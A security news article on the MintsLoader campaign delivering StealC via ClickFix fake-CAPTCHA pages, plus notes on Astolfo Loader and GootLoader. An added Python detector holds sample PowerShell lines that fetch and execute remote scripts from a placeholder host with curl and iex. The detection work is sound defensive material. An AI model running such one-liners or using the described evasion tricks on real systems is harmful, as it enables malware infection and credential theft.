MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Jan 27, 2025 | Ravie Lakshmanan | Malware / SEO Poisoning

Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.

“MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,” cybersecurity company eSentire said in an analysis.

The campaign has targeted the electricity, oil and gas, and legal services sectors in the United States and Europe, per the company, which detected the activity in early January 2025.

The development comes amid a spike in malicious campaigns that abuse fake CAPTCHA verification prompts to trick users into copying and executing PowerShell scripts to get past the checks, a technique that has come to be known as ClickFix and KongTuke.


“KongTuke involves an injected script that currently causes associated websites to display fake ‘verify you are human’ pages,” Palo Alto Networks Unit 42 said in a report detailing a similar campaign distributing BOINC.

“These fake verification pages load a potential victim’s Windows copy/paste buffer with malicious PowerShell script. The page also gives detailed instructions asking potential victims to paste and execute the script in a Run window.”

The attack chain documented by eSentire begins when users click on a link in a spam email, leading to the download of an obfuscated JavaScript file. The script is responsible for running a PowerShell command to download MintsLoader via curl and execute it, after which it deletes itself from the host to avoid leaving traces.

Alternate sequences redirect the message recipients to ClickFix-style pages that lead to the delivery of MintsLoader via the Windows Run prompt.

The loader malware, in turn, contacts a command-and-control (C2) server to fetch interim PowerShell payloads that perform various checks to evade sandboxes and resist analysis efforts. It also features a Domain Generation Algorithm (DGA) whose seed value is derived by adding the current day of the month, which it uses to create the C2 domain name.
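The delivery chain described above (a JScript host or the Run prompt spawning PowerShell that fetches a remote script with curl) has a recognisable process-creation signature. The following detection sketch is an added example, not code from eSentire or the article; the log format (parent|image|command line) and the sample events are constructed for illustration.

```python
"""Score process-creation events for the MintsLoader-style delivery chain:
a script host (wscript/cscript) or explorer.exe (the Run prompt) launching
PowerShell that pulls content with curl or a similar download primitive.

The pipe-separated field layout and every event below are constructed
samples (hypothetical format), not real telemetry."""
import re

# Constructed sample events: parent image | child image | command line
SAMPLE_EVENTS = [
    'explorer.exe|powershell.exe|powershell -w hidden -c "curl http://placeholder.invalid/a | iex"',
    "wscript.exe|powershell.exe|powershell -NoP -c curl.exe -o %TEMP%\\x.ps1 http://placeholder.invalid/x",
    "cmd.exe|powershell.exe|powershell -File C:\\scripts\\backup.ps1",
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\a\\notes.txt",
]

# Parents that match the two delivery paths in the article: JScript file, Run prompt
SUSPICIOUS_PARENTS = {"explorer.exe", "wscript.exe", "cscript.exe"}
# Download primitives commonly seen in one-line PowerShell droppers
DOWNLOAD_RE = re.compile(r"\b(curl(\.exe)?|invoke-webrequest|iwr|downloadstring)\b", re.I)
# Hidden window flag, used to keep the console out of sight
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def score_event(line):
    """Return 0..3: one point each for suspicious parent, download verb, hidden window.
    Non-PowerShell children always score 0."""
    parent, image, cmd = line.split("|", 2)
    if image.lower() != "powershell.exe":
        return 0
    score = 0
    if parent.lower() in SUSPICIOUS_PARENTS:
        score += 1
    if DOWNLOAD_RE.search(cmd):
        score += 1
    if HIDDEN_RE.search(cmd):
        score += 1
    return score


def flag_events(lines, threshold=2):
    """Return the events whose score meets the threshold (default: 2 of 3 signals)."""
    return [line for line in lines if score_event(line) >= threshold]


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print("ALERT", score_event(hit), hit)
```

A score of 2 keeps the legitimate `cmd.exe -File` backup script out of the alert list while catching both the Run-prompt and script-host variants.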


The attack culminates with the deployment of StealC, an information stealer sold under the malware-as-a-service (MaaS) model since early 2023. It is assessed to be re-engineered from another stealer malware known as Arkei. One of the notable features of the malware is its ability to avoid infecting machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.

News of the MintsLoader campaign also follows the emergence of an updated version of the JinxLoader dubbed Astolfo Loader (aka Jinx V3) that has been rewritten in C++, likely for performance reasons, after its source code was sold off by the malware creator Rendnza to two separate buyers, Delfin and AstolfoLoader.

“While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary,” BlackBerry noted late last year.

“Services like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such tools can proliferate quickly and affordably and can be purchased via popular public hacking forums that are accessible to virtually anyone with an Internet connection.”


Cybersecurity researchers have also shed light on the inner workings of the GootLoader malware campaigns, which are known to weaponize search engine optimization (SEO) poisoning to redirect victims searching for agreements and contracts to compromised WordPress sites. These sites host a realistic-looking message board offering a file download that purportedly contains what the victim is looking for.

The malware operators have been found to make modifications to the WordPress sites that cause them to dynamically load the fake forum page content from another server, called the “mothership” by Sophos.

GootLoader campaigns, apart from geofencing IP address ranges and only allowing requests that originate from specific countries of interest, go further by permitting a potential victim to visit the infected site only once in 24 hours, adding the visitor's IP to a block list after the first request.

“Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often cannot identify the modifications in their own site or trigger the GootLoader code to run when they visit their own pages,” security researcher Gabor Szappanos said.
